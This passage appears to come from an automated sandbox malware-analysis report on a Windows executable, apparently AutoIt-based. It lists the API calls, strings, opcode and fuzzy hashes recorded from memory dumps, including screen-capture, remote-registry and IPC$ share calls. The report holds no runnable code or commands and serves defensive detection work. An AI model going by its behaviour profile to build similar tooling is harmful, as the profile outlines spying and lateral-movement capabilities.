          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,01157F37,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 0119061C
          • LoadStringW.USER32(00000000,?,01157F37,?), ref: 01190623
          • __swprintf.LIBCMT ref: 01190661
          • __swprintf.LIBCMT ref: 01190679
          • _wprintf.LIBCMT ref: 0119072D
          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 01190746
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
          • API String ID: 3631882475-2268648507
          • Opcode ID: 5e5aa6ceb796c17f5f6f625341792a93fd32b570cc623bca014f7001ab76f22f
          • Instruction ID: 301ecf6a04917d615d20148b3b6c8bda71cd6f822058ea0ec26d382489ddcbe3
          • Opcode Fuzzy Hash: 5e5aa6ceb796c17f5f6f625341792a93fd32b570cc623bca014f7001ab76f22f
          • Instruction Fuzzy Hash: 72417F72A0020AABDB18FBA0DC89DEE7B3DAF98755F504025F614B7144EB706E45CBB1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetLocalTime.KERNEL32(?), ref: 011A225C
          • __swprintf.LIBCMT ref: 011A2273
          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,011BBF48), ref: 011A24A6
          • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,011BBF48), ref: 011A24C0
          • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,011BBF48), ref: 011A24DA
          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,011BBF48), ref: 011A24F4
          • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,011BBF48), ref: 011A250E
          • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,011BBF48), ref: 011A2528
          • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,011BBF48), ref: 011A2542
          • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,011BBF48), ref: 011A255C
          • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,011BBF48), ref: 011A2576
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: FolderPath$LocalTime__swprintf
          • String ID: %.3d
          • API String ID: 3337348382-986655627
          • Opcode ID: 9a3e4e62b0eebb02d65f44f1cce4beccd672c092d7e506809e01dbad71d51019
          • Instruction ID: 68a53fd4ba3e52ddb6994f1dd9ee72a0a3121f821e0628588ff3945ff0933c9d
          • Opcode Fuzzy Hash: 9a3e4e62b0eebb02d65f44f1cce4beccd672c092d7e506809e01dbad71d51019
          • Instruction Fuzzy Hash: 13C1EC32654219ABDB2CFF60DC85FEE7378FB94705F4045AAF509A7084DB719A09CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
          • String ID: %s%u
          • API String ID: 1899580136-679674701
          • Opcode ID: 41e2d34cd23455c41558375245ef92531afc408a25719a16a1c657313dcfaa3d
          • Instruction ID: 3e4c08d3ea8d72de368739945e1b967850386d83a73631609c7d9558b151089a
          • Opcode Fuzzy Hash: 41e2d34cd23455c41558375245ef92531afc408a25719a16a1c657313dcfaa3d
          • Instruction Fuzzy Hash: 50A1E872504302ABDF19DF14C884BEE77A9FF84324F048929FDA99B245D770E586CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetDC.USER32(00000000), ref: 0116139D
          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 011613AE
          • CreateCompatibleDC.GDI32(00000000), ref: 011613B8
          • SelectObject.GDI32(00000000,?), ref: 011613C5
          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0116142B
          • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 01161464
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
          • String ID: (
          • API String ID: 3300687185-3887548279
          • Opcode ID: 07b60333aa6ffd952ad7b8224e3b0c16a515d30edd18f4cee7d046b132751ae1
          • Instruction ID: 6fc0b8704e7ea9274972d7496c612240a01c51421704170ff38858847f225855
          • Opcode Fuzzy Hash: 07b60333aa6ffd952ad7b8224e3b0c16a515d30edd18f4cee7d046b132751ae1
          • Instruction Fuzzy Hash: A4513C75A00309AFDB28CF98C884FAFBBB9EF49710F108519FA5A97240D771B944CB60
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 01160030
          • GetFileSize.KERNEL32(00000000,00000000), ref: 0116004B
          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 01160056
          • GlobalLock.KERNEL32 ref: 01160063
          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 01160072
          • GlobalUnlock.KERNEL32(00000000), ref: 01160079
          • CloseHandle.KERNEL32(00000000), ref: 01160080
          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0116008D
          • OleLoadPicture.OLEAUT32(?,00000000,00000000,011B29F8,?), ref: 011600AB
          • GlobalFree.KERNEL32 ref: 011600BD
          • GetObjectW.GDI32(?,00000018,?), ref: 011600E4
          • CopyImage.USER32 ref: 01160115
          • DeleteObject.GDI32(?), ref: 0116013D
          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 01160154
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
          • String ID:
          • API String ID: 3969911579-0
          • Opcode ID: d67f9fbfd8aadf0dda4997fa91b608189108624ad216fabec4a90afa8b36c74a
          • Instruction ID: fa529060101bca642697f704a6d7a83681d6bccd0dcdfc7b3523665689961885
          • Opcode Fuzzy Hash: d67f9fbfd8aadf0dda4997fa91b608189108624ad216fabec4a90afa8b36c74a
          • Instruction Fuzzy Hash: 8E416D75600208AFE729DFA8DC89FAA77B8EF49710F108154FA15EB280D775AD45CB60
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
          • String ID: 0
          • API String ID: 956284711-4108050209
          • Opcode ID: 984140972d785b03198c4be560c585cfb35a5957a4437be992c21d40a166e83e
          • Instruction ID: 4e53d97b210f7ad1f10cf4993933b679ff975cc4e2a114942944bb8a79c994f7
          • Opcode Fuzzy Hash: 984140972d785b03198c4be560c585cfb35a5957a4437be992c21d40a166e83e
          • Instruction Fuzzy Hash: 9D414E70204302AFE769EF68D8C8B6677AAFF44300F108518F955CB284DB74E885CF61
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
          • String ID: 0.0.0.0
          • API String ID: 1965227024-3771769585
          • Opcode ID: 88188beaa4871aaf856b1d4c56e961e89e6769e9e2b80400b7d2a3d134776f77
          • Instruction ID: ec7278becbdcf8a76a58d4eac5cfc1fbd45cad896d8a9e2490803f08dc997b87
          • Opcode Fuzzy Hash: 88188beaa4871aaf856b1d4c56e961e89e6769e9e2b80400b7d2a3d134776f77
          • Instruction Fuzzy Hash: 17213D36A101156BC728AB68DC44EFE736CEFA4715F0442A9F91D97140EF71A594C7B0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01132390: _wcslen.LIBCMT ref: 0113239D
            • Part of subcall function 01132390: _memmove.LIBCMT ref: 011323C3
          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0118F5C2
          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0118F5D9
          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0118F5EB
          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0118F5FE
          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0118F60B
          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0118F621
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: SendString$_memmove_wcslen
          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
          • API String ID: 369157077-1007645807
          • Opcode ID: ba4f65470815c94452df6c76d697563b2561ce5c0f9ea7144d7a3f913d63ef8a
          • Instruction ID: b90f331b9ebafa86969b1f22287dfb43bec10f6fb03fee8404caff2ec5c60a3a
          • Opcode Fuzzy Hash: ba4f65470815c94452df6c76d697563b2561ce5c0f9ea7144d7a3f913d63ef8a
          • Instruction Fuzzy Hash: 7221A53269021F75E728F7A4DC86FFE7378ABD0B44F104529E614AA0D4DBB06945CB94
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SendMessageW.USER32(?,?,000000FF,?), ref: 011791FD
          • SendMessageW.USER32(?,?,00000000,00000000), ref: 01179210
          • CharNextW.USER32(?,?,?,000000FF,?), ref: 01179242
          • SendMessageW.USER32(?,?,00000000,00000000), ref: 0117925A
          • SendMessageW.USER32(?,?,00000000,?), ref: 0117928B
          • SendMessageW.USER32(?,?,000000FF,?), ref: 011792A2
          • SendMessageW.USER32(?,?,00000000,00000000), ref: 011792B5
          • SendMessageW.USER32(?,00000402,?), ref: 011792F2
          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 01179366
          • SendMessageW.USER32(?,00001002,00000000,?), ref: 011793D0
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: MessageSend$CharNext
          • String ID:
          • API String ID: 1350042424-0
          • Opcode ID: 08f5f783c5a92f796fbf31148a8041b89583f69f4d5e41bc600fc321336c7556
          • Instruction ID: 4d1d003bde3a9b9b0bf42ffd9c7d6c940d04b9c49624e06a27d521b8a2d48409
          • Opcode Fuzzy Hash: 08f5f783c5a92f796fbf31148a8041b89583f69f4d5e41bc600fc321336c7556
          • Instruction Fuzzy Hash: 1A81C33560010CABEB28DF58DC85FFEB778EB55734F108269FA249B280D77599498BA0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: __swprintf_wcscpy$__i64tow__itow
          • String ID: %.15g$0x%p$False$True
          • API String ID: 3038501623-2263619337
          • Opcode ID: ba13e97382053f5fda9aa1225434098ea8a19bda499c67387b3c9422d8353efb
          • Instruction ID: c0043477ff2010683bbc2693fb4308cb4d94d4462f365ffa74ee59681f84feff
          • Opcode Fuzzy Hash: ba13e97382053f5fda9aa1225434098ea8a19bda499c67387b3c9422d8353efb
          • Instruction Fuzzy Hash: 4641E8729101119BD71CFB74DC81F6AB368FF65A00F0885A9D909CB244E735E954CBA2
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0118E56D
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0118E58C
          • __swprintf.LIBCMT ref: 0118E5E3
          • _wprintf.LIBCMT ref: 0118E690
          • _wprintf.LIBCMT ref: 0118E6B4
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
          • API String ID: 2295938435-8599901
          • Opcode ID: da48ddfc9e03fe64237182ba0d79b768a72d1fb9dce4c2285ff171310ba4e6d8
          • Instruction ID: 888345e33a1dce1e970cdcf277a6e8d317f8160dad5c8b8ad86b0e843a312e34
          • Opcode Fuzzy Hash: da48ddfc9e03fe64237182ba0d79b768a72d1fb9dce4c2285ff171310ba4e6d8
          • Instruction Fuzzy Hash: 7B518371E0120AABDB1CFBA4D885DEFB77DAF94744F108029E91567244EB70AE45CFA0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetWindowLongW.USER32(?,000000F0), ref: 011A1496
          • LoadImageW.USER32 ref: 011A14B1
          • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 011A14CA
          • DeleteObject.GDI32(?), ref: 011A14D8
          • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 011A14E6
          • LoadImageW.USER32 ref: 011A1529
          • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 011A1542
          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 011A1563
          • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 011A1587
          • SendMessageW.USER32(?,000000F7,00000001,?), ref: 011A1596
          • DeleteObject.GDI32(?), ref: 011A15A4
          • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 011A15B2
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
          • String ID:
          • API String ID: 3218148540-0
          • Opcode ID: 3037913640a9c4dc4054c8a0d8c6969a41ee9370a514ad47965b1c36deb349dc
          • Instruction ID: bed921f46791e0192495254bbdc0c95e5179c44e3b87f98246bebd88f202fb97
          • Opcode Fuzzy Hash: 3037913640a9c4dc4054c8a0d8c6969a41ee9370a514ad47965b1c36deb349dc
          • Instruction Fuzzy Hash: 5241B675744309BBEB388E68DC49FAB7BA8EB44721F044519FA52E72C0C770E448C7A0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • _wcsncpy.LIBCMT ref: 011965DD
          • _wcsncpy.LIBCMT ref: 01196609
            • Part of subcall function 0113F260: _wcslen.LIBCMT ref: 0113F262
            • Part of subcall function 0113F260: _wcscpy.LIBCMT ref: 0113F282
          • _wcstok.LIBCMT ref: 0119664C
            • Part of subcall function 01143DD8: __getptd.LIBCMT ref: 01143DDE
          • _wcstok.LIBCMT ref: 011966FF
          • GetOpenFileNameW.COMDLG32(00000058), ref: 011968C1
          • _wcslen.LIBCMT ref: 011968E0
          • _wcscpy.LIBCMT ref: 0119678E
            • Part of subcall function 01132390: _wcslen.LIBCMT ref: 0113239D
            • Part of subcall function 01132390: _memmove.LIBCMT ref: 011323C3
          • _wcslen.LIBCMT ref: 0119690A
          • GetSaveFileNameW.COMDLG32(00000058), ref: 01196954
            • Part of subcall function 011911B1: _memmove.LIBCMT ref: 01191244
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
          • String ID: X
          • API String ID: 3104067586-3081909835
          • Opcode ID: 25a58c4b28db75545f539a508f1373c49893a1cf1e7e1669f5711d506cf9229a
          • Instruction ID: 14318db21101726ddabd9c5e853baf4a800fe20da0c9d96f3fbcf81ac64e9ba3
          • Opcode Fuzzy Hash: 25a58c4b28db75545f539a508f1373c49893a1cf1e7e1669f5711d506cf9229a
          • Instruction Fuzzy Hash: 5FC1D5716083019FD72CEF64C884A9FB7E5BFD4718F04892DE9A997250EB30E945CB62
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01132390: _wcslen.LIBCMT ref: 0113239D
            • Part of subcall function 01132390: _memmove.LIBCMT ref: 011323C3
          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 01188698
          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 011886B5
          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 011886D3
          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 01188701
          • CLSIDFromString.OLE32(?,?), ref: 0118872A
          • RegCloseKey.ADVAPI32(000001FE), ref: 01188736
          • RegCloseKey.ADVAPI32(?), ref: 0118873C
          Strings
          Similarity
          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
          • API String ID: 600699880-22481851
          • Opcode ID: 578ba607c81d5fca70c981e6a05cd3a8291d2fa90816c20167443898d3cf276d
          • Instruction ID: b93d2cc79de3cd97a97b6d0bf55aa608b0fd33039632f118639ad8dcbcb33758
          • Opcode Fuzzy Hash: 578ba607c81d5fca70c981e6a05cd3a8291d2fa90816c20167443898d3cf276d
          • Instruction Fuzzy Hash: 80414976D0020EABCB18FFA4D884EDE77B9EF98344F50C125E915A7254EB74A909CF60
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0119B103
          Similarity
          • API ID: ConnectRegistry_memmove_wcslen
          • String ID:
          • API String ID: 15295421-0
          • Opcode ID: 312d6bfc250dc0f3ec730d6235b50e090a89a1d983ca8b362e7bd44b5136ce0f
          • Instruction ID: 6cd996d0220c5fc26ecf09012a403365c9e6c1e7db8ccc7de45270f77a884d62
          • Opcode Fuzzy Hash: 312d6bfc250dc0f3ec730d6235b50e090a89a1d983ca8b362e7bd44b5136ce0f
          • Instruction Fuzzy Hash: 75E190B1618201AFDB18EF68DC81F1BB7E9BF98704F148A1CF59587284DB35E901CB96
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,011A95B7), ref: 011A933A
          • SafeArrayAllocData.OLEAUT32(011A95B7), ref: 011A9389
          • VariantInit.OLEAUT32(?), ref: 011A939B
          • SafeArrayAccessData.OLEAUT32(011A95B7,?), ref: 011A93BC
          • VariantCopy.OLEAUT32(?,?), ref: 011A941B
          • SafeArrayUnaccessData.OLEAUT32(011A95B7), ref: 011A942E
          • VariantClear.OLEAUT32(?), ref: 011A9443
          • SafeArrayDestroyData.OLEAUT32(011A95B7), ref: 011A9468
          • SafeArrayDestroyDescriptor.OLEAUT32(011A95B7), ref: 011A9472
          • VariantClear.OLEAUT32(?), ref: 011A9484
          • SafeArrayDestroyDescriptor.OLEAUT32(011A95B7), ref: 011A94A1
          Similarity
          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
          • String ID:
          • API String ID: 2706829360-0
          • Opcode ID: 7f0adb0fa46c41a5e333743a820f9f17bfbb85695677e32aeebd4124e811c43e
          • Instruction ID: e609c2dc12854f1cf87163758f391d55b13cd8118c79dae24bbb663453dd0a01
          • Opcode Fuzzy Hash: 7f0adb0fa46c41a5e333743a820f9f17bfbb85695677e32aeebd4124e811c43e
          • Instruction Fuzzy Hash: 75516176A0021DEFCB18DFE4D9849DEBB79FF88318F504569E905A7204DB34AA45CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • __swprintf.LIBCMT ref: 01163058
          • __swprintf.LIBCMT ref: 0116306A
          • __wcsicoll.LIBCMT ref: 01163077
          • FindResourceW.KERNEL32(?,?,0000000E), ref: 0116308A
          • LoadResource.KERNEL32(?,00000000), ref: 011630A2
          • LockResource.KERNEL32(00000000), ref: 011630AF
          • FindResourceW.KERNEL32(?,?,00000003), ref: 011630DC
          • LoadResource.KERNEL32(?,00000000), ref: 011630EA
          • SizeofResource.KERNEL32(?,00000000), ref: 011630F9
          • LockResource.KERNEL32(?), ref: 01163105
          Similarity
          • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
          • String ID:
          • API String ID: 1158019794-0
          • Opcode ID: 70851b5c4685f2a62240a31cc7abcf595c9e6352f841540fd2b3c067fa4c0b9c
          • Instruction ID: 5cdf71c61017df30946ce1344e70e7c8ffbaeffb0c951e69cb87e95b019a2cdd
          • Opcode Fuzzy Hash: 70851b5c4685f2a62240a31cc7abcf595c9e6352f841540fd2b3c067fa4c0b9c
          • Instruction Fuzzy Hash: E9412532610215ABD728CF65EC84FAB7BBDFB88710F048066F925C6284E776E595C7A0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: AddressProc_free_malloc$_strcat_strlen
          • String ID: AU3_FreeVar
          • API String ID: 2634073740-771828931
          • Opcode ID: 985bfb5ad799df098bc2c11ac780d8b1d0a0fd951878ac2ee571b382535bd885
          • Instruction ID: ddb49aea02f67b555a8e72f3beb322efcf7ce55799bb88f8471cb4848b390076
          • Opcode Fuzzy Hash: 985bfb5ad799df098bc2c11ac780d8b1d0a0fd951878ac2ee571b382535bd885
          • Instruction Fuzzy Hash: C8B1AEB4A00207DFCB08EF58C884A6AB7B5FF88318F15C169E9158B751DB31E951CFA1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01186308: GetCursorPos.USER32(?), ref: 0118631D
            • Part of subcall function 01186308: ScreenToClient.USER32 ref: 0118633A
            • Part of subcall function 01186308: GetAsyncKeyState.USER32(?), ref: 01186377
            • Part of subcall function 01186308: GetAsyncKeyState.USER32(?), ref: 01186387
          • DefDlgProcW.USER32(?,00000205,?,?), ref: 011A10FF
          • ImageList_DragLeave.COMCTL32(00000000), ref: 011A111D
          • ImageList_EndDrag.COMCTL32 ref: 011A1123
          • ReleaseCapture.USER32 ref: 011A1129
          • SetWindowTextW.USER32(?,00000000), ref: 011A11C0
          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 011A11D0
          Strings
          Similarity
          • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
          • String ID: @GUI_DRAGFILE$@GUI_DROPID
          • API String ID: 2483343779-2107944366
          • Opcode ID: b000a874f6ad4ebbed479f6087c79ef5057e01b9981f7c57861e6335e59012e3
          • Instruction ID: bf4bdb02ae06ad1bacd49a393f6f04d20ec31c111d72c80857231a1cfd6d31e6
          • Opcode Fuzzy Hash: b000a874f6ad4ebbed479f6087c79ef5057e01b9981f7c57861e6335e59012e3
          • Instruction Fuzzy Hash: 28512575204301AFD71CEF28D884FAB7BA5FF88354F404629F9519B294DB30A849CBA2
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01180616
          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0118062A
          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0118064B
          • _wcslen.LIBCMT ref: 01180696
          • _wcscat.LIBCMT ref: 011806A9
          • SendMessageW.USER32(?,00001057,00000000,?), ref: 011806C2
          • SendMessageW.USER32(?,00001061,?,?), ref: 011806F4
          Strings
          Similarity
          • API ID: MessageSend$Window_wcscat_wcslen
          • String ID: -----$SysListView32
          • API String ID: 4008455318-3975388722
          • Opcode ID: ee879d8476d1af68d31a75316865c2b00ef29cfe0a2f1cb54b0138f832f0db43
          • Instruction ID: 46d8980fc69057cd8c3c2c3a922331f523b74c5e8dfe73cf53acf2cb9ad48326
          • Opcode Fuzzy Hash: ee879d8476d1af68d31a75316865c2b00ef29cfe0a2f1cb54b0138f832f0db43
          • Instruction Fuzzy Hash: E951B670500308ABDB28DF68C889FEA77A9EF9C304F104619F954972C1D3B5A988CF64
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01178101
          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01178104
          • GetWindowLongW.USER32(?,000000F0), ref: 01178128
          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0117814B
          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 011781BF
          • SendMessageW.USER32(?,00001074,?,00000007), ref: 0117820D
          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 01178228
          • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 0117824A
          • SendMessageW.USER32(?,0000101E,00000001,?), ref: 01178261
          • SendMessageW.USER32(?,00001008,?,00000007), ref: 01178279
          Similarity
          • API ID: MessageSend$LongWindow
          • String ID:
          • API String ID: 312131281-0
          • Opcode ID: 8569d2300f4ab19a6d66c0d81cf3a1a10016c1b94b3fb31faa3183ce87a9a364
          • Instruction ID: 7127d9cf184550b7fa5c379b947068954b9cbdf59a657bba645bd04d89e58e57
          • Opcode Fuzzy Hash: 8569d2300f4ab19a6d66c0d81cf3a1a10016c1b94b3fb31faa3183ce87a9a364
          • Instruction Fuzzy Hash: 65616A74A00209AFDB18DF98DC84FEA77B9FF49314F104259FA14AB381D7B0AA45CB90
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: Menu$CreateItem$DrawInfoInsertPopup
          • String ID: 0
          • API String ID: 161812096-4108050209
          • Opcode ID: ba4d5134bf1eb01df425cf1847bf17fe38eea833fa803a19937da64212d28b67
          • Instruction ID: 77a8a46521bfd4ef33be1cca10f8bb946f46bff6f1aa404d1e91ce10677d366f
          • Opcode Fuzzy Hash: ba4d5134bf1eb01df425cf1847bf17fe38eea833fa803a19937da64212d28b67
          • Instruction Fuzzy Hash: 6D418D75A01209AFDB18DF68D888EDAB7B4FF4D310F148259ED299B345D730A885CFA1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetModuleHandleW.KERNEL32(00000000,011D90E8,?,00000100,?,C:\Users\user\77066510\txoxpdjc.qnr), ref: 0116403E
          • LoadStringW.USER32(00000000), ref: 01164047
          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0116405C
          • LoadStringW.USER32(00000000), ref: 0116405F
          • _wprintf.LIBCMT ref: 01164088
          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 011640A0
          Strings
          • C:\Users\user\77066510\txoxpdjc.qnr, xrefs: 01164027
          • %s (%d) : ==> %s: %s %s, xrefs: 01164083
          Similarity
          • API ID: HandleLoadModuleString$Message_wprintf
          • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\77066510\txoxpdjc.qnr
          • API String ID: 3648134473-199605588
          • Opcode ID: 9ea6c5ff81116cf7dfe161cf1b9a57aa20170d915419d0c0246852eac9f2a280
          • Instruction ID: 9cfc71d2548e355b85112cc9a56966087c403d4e61f22ac5a41a9ebb3032f586
          • Opcode Fuzzy Hash: 9ea6c5ff81116cf7dfe161cf1b9a57aa20170d915419d0c0246852eac9f2a280
          • Instruction Fuzzy Hash: 8801A7B5A503283AEB24E695DC46FF6372CD784B01F008199FB08AA0809AF029858BB1
          Uniqueness

          Uniqueness Score: -1.00%

          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6119df97a426567a77c56cf764143f5572c369ed99447c1c78261e6669f2c519
          • Instruction ID: 1842dca27b4b9f86e842fb55f9e1ca6c06db7d05aac78fb23a7b841c83098383
          • Opcode Fuzzy Hash: 6119df97a426567a77c56cf764143f5572c369ed99447c1c78261e6669f2c519
          • Instruction Fuzzy Hash: 05515C70600305ABEB28EF69DC81FAB77A9BB58714F108628FA15DB2C1D7B1E854CF50
          Uniqueness

          Uniqueness Score: -1.00%

          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ab629e8830496f98edab67129025500f6ef2d764ce099e103df15203c3a9253c
          • Instruction ID: 4b81b3c51ad73b7d771189f9e06f2a91423c03731d88f181c8276307778e6633
          • Opcode Fuzzy Hash: ab629e8830496f98edab67129025500f6ef2d764ce099e103df15203c3a9253c
          • Instruction Fuzzy Hash: 8741CA322542406AF379662DF8C4BE6BBA8FBA6335F14012BF595C9680C3B674D5C721
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: _memmove$_memcmp
          • String ID: '$\$h
          • API String ID: 2205784470-1303700344
          • Opcode ID: 01456719d7049e123114bae6d8156477e4a00af061eb3d14794da9cb7b4e1179
          • Instruction ID: 909862b5f801251315e22067d746d500476da12494125981b888cfa61bbf286e
          • Opcode Fuzzy Hash: 01456719d7049e123114bae6d8156477e4a00af061eb3d14794da9cb7b4e1179
          • Instruction Fuzzy Hash: 44E1B075A0424A8FCB1DCF68C890ABEBBF2FF89304F24855ED86597741D730A942CB91
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • InterlockedIncrement.KERNEL32(011D7F04), ref: 0115C5DF
          • InterlockedDecrement.KERNEL32(011D7F04), ref: 0115C5FD
          • Sleep.KERNEL32(?), ref: 0115C605
